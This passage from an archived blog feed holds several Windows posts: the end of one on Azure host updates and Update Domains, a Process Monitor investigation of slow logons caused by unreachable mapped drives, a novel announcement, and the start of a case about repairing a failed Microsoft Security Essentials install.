OS, which we deploy as a VHD, on each server and then the FC instructs the HAs to reboot their servers into the new image. </P> <H3> PaaS Update Orchestration </H3> <P> A key attribute of Windows Azure is its PaaS scale-out compute model. When you use one of the stateless virtual machine types in your Cloud Service, whether Web or Worker, you can easily scale-up and scale-down the role just by updating the instance count of the role in your Cloud Service’s configuration. The FC does all the work automatically to create new virtual machines when you scale out and to shut down virtual machines and remove when you scale down. </P> <P> What makes Windows Azure’s scale-out model unique, though, is the fact that it makes high-availability a core part of the model. The FC defines a concept called Update Domains (UDs) that it uses to ensure a role is available throughout planned updates that cause instances to restart, whether they are updates to the role applied by the owner of the Cloud Service, like a role code update, or updates to the host that involve a server reboot, like a host OS update. The FC’s guarantee is that no planned update will cause instances from different UDs to be offline at the same time. A role has five UDs by default, though a Cloud Service can request up to 20 UDs in its service definition file. The figure below shows how the FC spreads the instances of a Cloud Service’s two roles across three UDs. </P> <P> <IMG alt="image" border="0" height="186" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4682.image_5F00_thumb_5F00_495B0797.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121415i496EE3B956D36F3C" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="277" /> </P> <P> Role instances can call runtime APIs to determine their UD and the portal also shows the mapping of role instances to UDs. Here’s a cloud service with two roles having two instances each, so each UD has one instance from each role: </P> <P> <IMG alt="image" border="0" height="166" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6787.image_5F00_thumb_5F00_5DAA917B.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121416iDFAF202E90FE3A4A" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The behavior of the FC with respect to UDs differs for Cloud Service updates and host updates. When the update is one applied by a Cloud Service, the FC updates all the instances of each UD in turn. It moves to a subsequent UD only when all the instances of the previous have restarted and reported themselves healthy to the GA, or when the Cloud Service owner asks the FC via a service management API to move to the next UD. </P> <P> Instead of proceeding one UD at a time, the order and number of instances of a role that get rebooted concurrently during host updates can vary. That’s because the placement of instances on servers can prevent the FC from rebooting the servers on which all instances of a UD are hosted at the same time, or even in UD-order. Consider the allocation of instances to servers depicted in the diagram below. Instance 1 of Service A’s role is on server 1 and instance 2 is on server 2, whereas Service B’s instances are placed oppositely. No matter what order the FC reboots the servers, one service will have its instances restarted in an order that’s reverse of their UDs. The allocation shown is relatively rare since the FC allocation algorithm optimizes by attempting to place instances from the same UD - regardless of what service they belong to - on the same server, but it’s a valid allocation because the FC can reboot the servers without violating the promise that it not cause instances of different UDs of the same role (of the a single service) to be offline at the same time. </P> <P> <IMG alt="image" border="0" height="145" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5661.image_5F00_thumb_5F00_54185EEC.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121417i430C72E6452E6DC2" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="252" /> </P> <P> Another difference between host updates and Cloud Service updates is that when the update is to the host, however, the FC must ensure that one instance doesn’t indefinitely stall the forward progress of server updates across the datacenter. The FC therefore allots instances at most five minutes to shut down before proceeding with a reboot of the server into a new host OS and at most fifteen minutes for a role instance to report that it’s healthy from when it restarts. It takes a few minutes to reboot the host, then restart VMs, GAs and finally the role instance code, so an instance is typically offline anywhere between fifteen and thirty minutes depending on how long it and any other instances sharing the server take to shut down, as well as how long it takes to restart. More details on the expected state changes for Web and Worker roles during a host OS update can be found <A href="#" target="_blank"> here </A> . Note that for PaaS services the FC manages the OS servicing for guests as well, so a host OS update is typically followed by a corresponding guest OS update (for PaaS services that have opted into updates), which is orchestrated by UD like other cloud service updates. </P> <H3> IaaS and Host Updates </H3> <P> The preceding discussion has been in the context of PaaS roles, which automatically get the benefits of UDs as they scale out. Virtual Machines, on the other hand, are essentially single-instance roles that have no scale-out capability. An important goal of the IaaS feature release was to enable Virtual Machines to be able to also achieve high availability in the face of host updates and hardware failures and the Availability Sets feature does just that. You can add Virtual Machines to Availability Sets using PowerShell commands or the Windows Azure management portal. Here’s an example cloud service with virtual machines assigned to an availability set: </P> <P> <IMG alt="image" border="0" height="244" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2022.image_5F00_thumb_5F00_28D3C7E5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121418i5AC91A74F1B024D6" style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="322" /> </P> <P> Just like roles, Availability Sets have five UDs by default and support up to twenty. The FC spreads instances assigned to an Availability Set across UDs, as shown in the figure below. This allows customers to deploy Virtual Machines designed for high availability, for example two Virtual Machines configured for SQL Server mirroring, to an Availability Set, which ensures that a host update will cause a reboot of only one half of the mirror at a time as described <A href="#" target="_blank"> here </A> (I don’t discuss it here, but the FC also uses a feature called Fault Domains to automatically spread instances of roles and Availability Sets across servers so that any single hardware failure in the datacenter will affect at most half the instances). </P> <P> <IMG alt="image" border="0" height="135" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7725.image_5F00_thumb_5F00_21B48B6D.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121419i5C8757E926394253" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="554" /> </P> <H3> More Information </H3> <P> You can find more information about Update Domains, Fault Domains and Availability Sets in my Windows Azure conference sessions, recordings of which you can find on my Mark’s Webcasts page <A href="#" target="_blank"> here </A> . Windows Azure MSDN documentation describes host OS updates <A href="#" target="_blank"> here </A> and the service definition schema for Update Domains <A href="#" target="_blank"> here </A> . </P> </BODY></HTML> Thu, 27 Jun 2019 07:27:36 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/windows-azure-host-updates-why-when-and-how/ba-p/724308 MarkRussinovich 2019-06-27T07:27:36Z The Case of the Veeerrry Slow Logons https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-veeerrry-slow-logons/ba-p/724275 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 01, 2012 </STRONG> <BR /> <P> This case is my favorite kind of case, one where I use my own tools to solve a problem affecting me personally.&nbsp; The problem at the root of it is also one you might run into, especially if you travel, and demonstrates the use of some Process Monitor features that many people aren’t aware of, making it an ideal troubleshooting example to document and share. </P> <P> The story unfolds the week before last when I made a trip to Orlando to speak at Microsoft’s TechEd North America conference. While I was there I began to experience five minute black-screen delays when I logged on to my laptop’s Windows 7 installation: </P> <P> <IMG alt="image" border="0" height="218" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1817.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121399iD2F91A7E39512365" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="449" /> </P> <P> I’d typically chalk up an isolated delay like this to networking issues, common at conferences and with hotel WiFi, but I hit the issue consistently switching between the laptop’s Windows 8 installation, where I was doing testing and presentations, and the Windows 7 installation, where I have my development tools. Being locked out of your computer for that long is annoying to say the least. </P> <P> The first time I ran into the black screen I forcibly rebooted the system after a couple of minutes because I thought it had hung, but when the delay happened a second time I was forced to wait it out and face the disappointing reality that my system was sick. When I logged off and back on again without a reboot in between, though, I didn’t hit the delay. It only occurred when logging on after a reboot, which I was doing as I switched between Windows 7 and Windows 8. What made the situation especially frustrating was that whenever I rebooted I was always in a hurry to get ready for my next presentation, so had to suffer with the inconvenience for several days before I finally had the opportunity to investigate. </P> <P> Once I had a few spare moments, I launched <A href="#" target="_blank"> Sysinternals Autoruns </A> , an advanced auto-start management utility, to disable any auto-starting images that were located on network shares. I knew from previous executions of Autoruns on the laptop that Microsoft IT configures several scheduled tasks to execute batch files that reside on corporate network shares, so suspected that timeouts trying to launch them were to blame: </P> <P> <IMG alt="image" border="0" height="57" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4135.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121400i4E757713638A0206" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> I logged off and logged back on with fingers crossed, but the delay was still there. Next, I tried logging into a local account to see if this was a machine-wide problem or one affecting just my profile. No delay. That was a positive sign since it meant that whatever the issue was, it would probably be relatively easy to fix once identified. </P> <P> My goal now was to determine what was holding up the switch to the desktop. I had to somehow get visibility into what was going on during a logon immediately following a boot. The way that immediately jumped to mind as the easiest was to use <A href="#" target="_blank"> Sysinternals Process Monitor </A> to capture a trace of the boot process. Process Monitor, a tool that monitors system-wide file system, registry, process, DLL and network operations, has the ability to capture activity from very early in the boot, stopping its capture only when the system shuts down or you run the Process Monitor user interface. I selected the boot logging entry from the Options and opened the boot logging dialog: </P> <P> <IMG alt="SNAGHTML274998d" border="0" height="213" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3073.SNAGHTML274998d_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121401i94D67F97F7303849" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="SNAGHTML274998d" width="377" /> </P> <P> The dialog lets you direct Process Monitor to collect profiling events while it’s monitoring the boot, which are periodic samples of thread stacks. I enabled one-second profiling, hoping that even if I didn’t spot operations that explained the delay, that I could get a clue from the stacks of the threads that were active just before or during the delay. </P> <P> After I rebooted, I logged on, waited for five minutes looking at a black screen, then finally got to my desktop, where I ran Process Monitor again and saved the boot log. Instead of scanning the several million events that had been captured, which would have been like looking for a needle in a haystack, I used this Process Monitor filter to look for operations that took more than one second, and hence might have caused the slow down: </P> <P> <IMG alt="SNAGHTML27bf247" border="0" height="103" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2068.SNAGHTML27bf247_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121402iD08C96BD318DA951" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="SNAGHTML27bf247" width="454" /> </P> <P> Unfortunately, the filter cleared the display, dashing my hopes for quickly finding a clue. </P> <P> Wondering if perhaps the sequence of processes starting during the logon might reveal something, I opened the Process Tree dialog from the Tools menu. The dialog shows the parent-child relationships of all the processes active during a capture, which in the case of a boot trace means all the processes that executed during the boot and logon process. Focusing my attention on Winlogon.exe, the interactive logon manager, I noticed that a process named Atbroker.exe launched around the time I entered my credentials, and then Userinit.exe executed at the time my desktop finally appeared: </P> <P> <IMG alt="image" border="0" height="116" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0312.image_5F00_thumb_5F00_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121403i238F52914FDBBBE4" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="444" /> </P> <P> The key to the solving the mystery lay in the long pause in between. I knew that Logonui.exe simply displays the logon user interface and that Atbroker.exe is just a helper for transitioning from the logon user interface to a user session, which ruled them out, at least initially. The black screen disappeared when Userinit.exe had started, so Userinit’s parent process, Winlogon.exe, was the remaining suspect. I set a filter to include just events from Winlogon.exe and added the Relative Time column to easily see when events occurred relative to the start of the boot. When I looked at the resulting items I could easily see the delay was actually about six minutes, but there was no activity in that time period to point me at a cause: </P> <P> <IMG alt="image" border="0" height="266" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5621.image_5F00_thumb_5F00_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121404i101AC586EAC90CC8" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="522" /> </P> <P> Profiling events are excluded by default, so I clicked on the profile event filter button in the toolbar to include them, hoping that they might offer some insight: </P> <P> <IMG alt="image" border="0" height="61" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1004.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121405iFD1E873458112999" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="244" /> </P> <P> In order to minimize log file sizes, Process Monitor’s profiling only captures a thread’s stack if the thread has executed since the last time it was sampled. I therefore was expecting to have to look at the thread profile events at the start of the event, but my eye was drawn to a pattern of the same four threads sampled every second throughout the entire black-screen period: </P> <P> <IMG alt="image" border="0" height="318" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4544.image_5F00_thumb_5F00_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121406iEFE281261DA361D3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="254" /> </P> <P> I was fairly certain that whatever thread was holding things up had executed some function at the beginning of the interval and was dormant throughout, so was skeptical that any of these active threads were related to the issue, but it was worth spending a few seconds to look at them. I opened the event properties dialog for one of the samples by double-clicking on it and switched to its Stack page, on the off chance that the names of the functions on the stack had an answer. </P> <P> When I first run Process Monitor on a system I configure it to pull symbols for Windows images from the Microsoft public symbol server using the <A href="#" target="_blank"> Debugging Tools for Windows </A> debug engine DLL, so I can see descriptive function names in the stack frames of Windows executables, rather than just file offsets: </P> <P> <IMG alt="SNAGHTML3eeaff2" border="0" height="302" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8345.SNAGHTML3eeaff2_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121407iC19A053F70921657" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="SNAGHTML3eeaff2" width="404" /> </P> <P> The first thread’s stack identified the thread as a core Winlogon “state machine” thread waiting for some unknown notification, yielding no clues: </P> <P> <IMG alt="image" border="0" height="320" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3566.image_5F00_thumb_5F00_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121408i4DED504CA751E969" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="344" /> </P> <P> The next thread’s stack was just as unenlightening, showing the thread to be a generic worker thread: </P> <P> <IMG alt="image" border="0" height="265" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4628.image_5F00_thumb_5F00_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121410iC776FE6FDD2D0EA5" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="344" /> </P> <P> The stack of the third thread was much more interesting. It was many frames deep, including calls into functions of the Multiple UNC Provider (MUP) and Distributed File System Client (DFSC) drivers, both related to accessing file servers: </P> <P> <IMG alt="image" border="0" height="511" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3566.image_5F00_thumb_5F00_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121411iCA42E6603BAA8B72" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="344" /> </P> <P> I scrolled down to see the frames higher on the stack and the name of one of the functions, <STRONG> WLGeneric_ActivationAndNotifyStartShell_Execute </STRONG> , pretty much confirmed the thread to be the one responsible for the problem, since it implied that it was supposed to start the desktop shell: </P> <P> <IMG alt="image" border="0" height="202" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2072.image_5F00_thumb_5F00_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121412i007302AAB11EDEFF" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="344" /> </P> <P> The next frame’s function, <STRONG> WNetRestoreAllConnectionsW </STRONG> , combined with the deeper calls into file server functions, led me to conclude that Winlogon was trying to restore file server drive letter mappings before proceeding to launch my shell and give me access to the desktop. I quickly opened Explorer, recalling that I had two drives mapped to network shares hosted on computers inside the Microsoft network, one to my development system and another to the internal Sysinternals share where I publish pre-release versions of the tools. While at the conference I was not on the intranet, so Winlogon was unable to reconnect them during the logon and was eventually – after many minutes – giving up: </P> <P> <IMG alt="image" border="0" height="90" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5040.image_5F00_thumb_5F00_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121413i113CBF980B7AC7F8" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="454" /> </P> <P> Confident I’d solved the mystery, I right-clicked on each share and disconnected it. I rebooted the laptop to verify my fix (workaround to be precise), and to my immense satisfaction, the logon proceeded to the desktop within a few seconds. The case was closed! As for why the delays were unusually long, I haven’t had the time – or&nbsp; need - to investigate further. The point of this story isn’t to highlight this particular issue, but illustrate the use of the Sysinternals tools and troubleshooting techniques to solve problems. </P> <P> TechEd Europe, which took place in Amsterdam last week, gave me another chance to reprise the talks I’d given at TechEd US. I delivered the same Case of the Unexplained troubleshooting session I had at TechEd US, but this time I had the pleasure of sharing this very fresh and personal case. You can watch it and my other TechEd sessions either by going to my webcasts page, which lists all of my major sessions posted online, or follow these links directly: </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Windows Azure Virtual Machines and Virtual Networks </A> <BR /> <A href="#" target="_blank"> Windows Azure Internals </A> <BR /> <A href="#" target="_blank"> Malware Hunting with the Sysinternals Tools </A> <BR /> <A href="#" target="_blank"> Case of the Unexplained 2012 </A> </P> </BLOCKQUOTE> <P> And you can see all of both event’s sessions online at their webcast sites: </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> TechEd North America 2012 On-Demand Recordings </A> <BR /> <A href="#" target="_blank"> TechEd Europe 2012 On-Demand Recordings </A> </P> </BLOCKQUOTE> <P> I hope you enjoyed this case! </P> </BODY></HTML> Thu, 27 Jun 2019 07:26:23 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-veeerrry-slow-logons/ba-p/724275 MarkRussinovich 2019-06-27T07:26:23Z Announcing Trojan Horse, the Novel! https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/announcing-trojan-horse-the-novel/ba-p/724206 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 06, 2012 </STRONG> <BR /> <P> Many of you have read <A href="#" target="_blank"> Zero Day </A> , my first novel. It’s a cyberthriller that features Jeff Aiken and the beautiful Daryl Haugen, computer security experts that save the world from a devastating cyberattack. Its reviews and sales exceeded my expectations, so I’m especially excited about the sequel, Trojan Horse, which I think is even more timely and exciting. Trojan Horse, like Zero Day, is an action-packed cyberthriller on a global scale, pitting Jeff and Daryl against international forces in a fight for world security and their lives. Instead of telling you more, I’ll let the Trojan Horse video trailer, below, show you instead. </P> <P> Trojan Horse will be published on September 4, but you can preorder it now from your favorite online book seller (in the US only now, but Zero Day’s Korean publisher has already purchased foreign publishing rights). Find the ordering links, read more about Trojan Horse, see my other books, check out my book blog and find out where I’m speaking on my new website, <A href="#" target="_blank"> markrussinovich.com </A> . Preorder Trojan Horse now and tell your friends! </P> <DIV class="wlWriterSmartContent" id="scid:5737277B-5D6D-4f48-ABFC-DD9C333F4C5D:4244ffc4-869d-452f-8b29-7fcdd6644035" style="padding-bottom: 0px; padding-left: 0px; width: 425px; padding-right: 0px; display: block; float: none; margin-left: auto; margin-right: auto; padding-top: 0px"> <DIV> <EMBED height="355" src="https://www.youtube.com/v/lX1nqEPjes4&amp;hl=en" type="application/x-shockwave-flash" width="425"> </EMBED></DIV> </DIV> <BR /> </BODY></HTML> Thu, 27 Jun 2019 07:24:38 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/announcing-trojan-horse-the-novel/ba-p/724206 MarkRussinovich 2019-06-27T07:24:38Z The Case of My Mom’s Broken Microsoft Security Essentials Installation https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-my-mom-8217-s-broken-microsoft-security-essentials/ba-p/724196 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jan 03, 2012 </STRONG> <BR /> <P> As a reader of this blog I suspect that you, like me, are the IT support staff for your family and friends. And I bet many of you performed system maintenance duties when you visited your family and friends during the recent holidays. Every time I’m visiting my mom, I typically spend a few minutes running Sysinternals Process Explorer and Autoruns, as well as the Control Panel’s Program Uninstall page, to clean the junk that’s somehow managed to accumulate since my last visit. </P> <P> This holiday, though, I was faced with more than a regular checkup. My mom recently purchased a new PC, so as a result, I spent a frustrating hour removing the piles of crapware the OEM had loaded onto it (now I would recommend getting a <A href="#" target="_blank"> Microsoft Signature PC </A> , which are crapware-free). I say frustrating because of the time it took and because even otherwise simple applications were implemented as monstrosities with complex and lengthy uninstall procedures. Even the OEM’s warranty and help files were full-blown installations. Making matters worse, several of the craplets failed to uninstall successfully, either throwing error messages or leaving behind stray fragments that forced me to hunt them down and execute precision strikes. </P> <P> As my cleaning was drawing to a close, I noticed that the antimalware the OEM had put on the PC had a 1-year license, after which she’d have to pay to continue service. With excellent free antimalware solutions on the market, there’s no reason for any consumer to pay for antimalware, so I promptly uninstalled it (which of course was a multistep process that took over 20 minutes and yielded several errors). I then headed to the Internet to download what I – not surprisingly given my affiliation - consider the best free antimalware solution, <A href="#" target="_blank"> Microsoft Security Essentials (MSE) </A> . A couple of minutes later the setup program was downloaded and the installation wizard launched. After clicking through the first few pages it reported it was going to install MSE, but then immediately complained that an “error has prevented the Security Essentials setup wizard from completing successfully.”: </P> <P> <IMG alt="SNAGHTMLfe55b5c" border="0" height="283" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1220.SNAGHTMLfe55b5c_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121389iAB5914C07F0C1E85" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="SNAGHTMLfe55b5c" width="454" /> </P> <P> The suggestion to “restart your computer and try again” is intended to deal with failures caused by interference from an unfinished uninstall of existing antimalware (or a hope that whatever unexpected error condition caused the problem is transient). I’d just rebooted, so it didn’t apply. Clicking the “ <A href="#" target="_blank"> Get help on this issue </A> ” link provided some generic troubleshooting steps, like uninstalling other antimalware, ensuring that the Windows Installer service is configured and running (though by default it isn’t running on Windows 7 since it’s demand-start), and if all else fails, contacting customer support. </P> <P> I suspected that whatever I’d run into was rare enough that customer support wouldn’t be able to help (and what would they say if they knew Mark Russinovich was calling for tech support?), especially when I found no help on the web for error code 0x80070643. My brother in law, who is also a programmer and tech support for his neighborhood was watching over my shoulder to pick up some tips, so the pressure was on to fix the problem. Out came my favorite troubleshooting tool, <A href="#" target="_blank"> Sysinternals Process Monitor </A> (remember, “when in doubt, run Process Monitor”). </P> <P> I reran the MSE setup while capturing a trace with Process Monitor. Then I opened Process Monitor’s process tree view to find what processes were involved in the attempted install and identified Msiexec.exe (Windows Installer) and a few launcher processes. I also saw that Setup.exe launched Wermgr.exe, the Windows Error Reporting Manager, presumably to upload an error report to Microsoft: </P> <P> <IMG alt="image" border="0" height="315" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2112.image_5F00_thumb_5F00_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121390i1691D6D6C91F2F3D" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="224" /> </P> <P> I turned my attention back to the trace output and configured a filter that excluded everything but these processes of interest. Then I began the arduous job of working my way through tens of thousands of operations, hoping to find the needle in the haystack that revealed why the setup choked with error 0x80070643. </P> <P> As I scanned quickly to get an overall view, I noticed some writes to log files: </P> <P> <IMG alt="image" border="0" height="127" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1638.image_5F00_thumb_5F00_1D0C5AFD.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121391iEA5511F75D016459" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> However, the messages in them revealed nothing more than the cryptic error message shown in the dialog. </P> <P> After a few minutes I decided I should work my way back from where in the trace operations the error occurred, so returned to the tree, selected Wermgr.exe, and clicked “Go to event”: </P> <P> <IMG alt="image" border="0" height="99" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7827.image_5F00_thumb_5F00_0ECDE20D.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121392iB9FD8A9282989503" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> This would ideally be just after the setup encountered the fatal condition. Then I paged up in the trace, looking for clues. After several more minutes I noticed a pattern that accounted for almost all the operations up that point: Setup.exe was enumerating all the system’s installed applications. I determined that by observing it queried multiple installer-related registry locations, and I could see the names of the applications it found in the Details column for some of them. Here, for example, is one of the OEM’s programs, another help file-as-an-application, that I hadn’t bothered to uninstall: </P> <P> <IMG alt="image" border="0" height="119" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1122.image_5F00_thumb_5F00_19.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121393i4E569CA18B4ED25C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> I could now move quickly through the trace by scanning for application names. A minute later I stopped short, spotting something I shouldn’t have seen: “Microsoft Security Essentials”: </P> <P> <IMG alt="image" border="0" height="54" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3386.image_5F00_thumb_5F00_21.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121394i871EAD32D42EB767" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> I knew I hadn’t seen it listed in the installed programs list in the Control Panel in my earlier uninstall-fest, which I confirmed by rechecking. </P> <P> Why were there traces of MSE when it hadn’t been installed, and in fact wouldn’t install? I don’t know for sure, but after pondering this for a few minutes I came to the conclusion that the software my mother had used to transfer files and settings from her old system had copied parts of the MSE installation she had on the old PC. She likely had used whatever utility the OEM put on PC, but I would recommend using <A href="#" target="_blank"> Windows Easy Transfer </A> . But the reason didn’t really matter at this point, just getting MSE to install successfully, and I believed I had found the problem. I deleted the keys, reran the setup, and….hit the same error. </P> <P> Not ready to give up, I captured another trace. Suspecting that setup was tripping on other fragments of the phantom installation, I searched for “security essentials” in the new trace and found another reference before the setup bailed. To avoid performing this step multiple more times, I went to the registry and performed the same search, deleting about two dozen other keys that had “security essentials” somewhere in them. </P> <P> I held my breath and ran the installer again, but no go: </P> <P> <IMG alt="image" border="0" height="282" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8407.image_5F00_thumb_5F00_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121395i66DAED7BAC7F3EF6" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="454" /> </P> <P> The error code was different so I had apparently made some progress, but a web search still didn’t yield any clues. I captured yet another trace and began pouring through the operations. The install made it way past the installed application enumeration, generating tens of thousands of more operations. I scanned back from where Wermgr.exe launched, but was quickly overwhelmed. I just couldn’t spot what had made it unhappy, and that was assuming that whatever it was would be visible in the trace. My brother-in-law was growing skeptical, but I told him I wasn’t done. I was motivated by the challenge as much as the fact that I couldn’t let him tell his work buddies that he’d watched me fail. </P> <P> I decided I needed the guidance of a successful installation’s trace so that I could find where things went astray. When it’s an option, like it was here, side-by-side trace comparison is a powerful troubleshooting technique. I switched to my laptop, launched a Windows 7 virtual machine, and generated a trace of MSE’s successful installation on a clean system. I then 